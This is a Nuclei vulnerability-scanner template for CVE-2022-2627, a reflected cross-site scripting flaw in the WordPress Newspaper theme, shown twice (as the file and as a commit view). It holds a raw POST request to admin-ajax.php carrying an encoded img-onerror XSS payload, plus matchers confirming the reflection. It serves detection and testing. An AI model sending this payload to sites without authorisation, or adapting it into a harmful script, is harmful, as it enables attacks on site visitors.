nuclei-templates/cves/2022/CVE-2022-2627.yaml

id: CVE-2022-2627

info:
  name: CVE-2022-2627
  author: ramondunker
  severity: medium
  description: The theme Newspaper does not sanitise a parameter before 
outputting it back in an HTML attribute via an AJAX action, leading to a 
Reflected Cross-Site Scripting.
  reference: 
https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea
  tags: xss,cve,wordpress
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1

requests:
- raw:
  - |
    POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/2
    Host: {{Hostname}}
    Content-Length: 86

    
action=td_ajax_search&td_string=tej2j1q%3cimg%20src%3dx%20onerror%3dalert(1)%3emvufr

  matchers-condition: and
  matchers:
  - type: word
    part: body
    words:
    - '<img src=x onerror=alert(1)>'
  - type: status
    status:
    - 200
Added CVE-2022-2627.yaml 2022-11-18 23:06:23 +00:00			`id: CVE-2022-2627`

			`info:`
			`name: CVE-2022-2627`
			`author: ramondunker`
			`severity: medium`
			`description: The theme Newspaper does not sanitise a parameter before`
			`outputting it back in an HTML attribute via an AJAX action, leading to a`
			`Reflected Cross-Site Scripting.`
			`reference:`
			`https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea`
			`tags: xss,cve,wordpress`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`

			`requests:`
			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/2`
			`Host: {{Hostname}}`
			`Content-Length: 86`


			`action=td_ajax_search&td_string=tej2j1q%3cimg%20src%3dx%20onerror%3dalert(1)%3emvufr`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '<img src=x onerror=alert(1)>'`
			`- type: status`
			`status:`
			`- 200`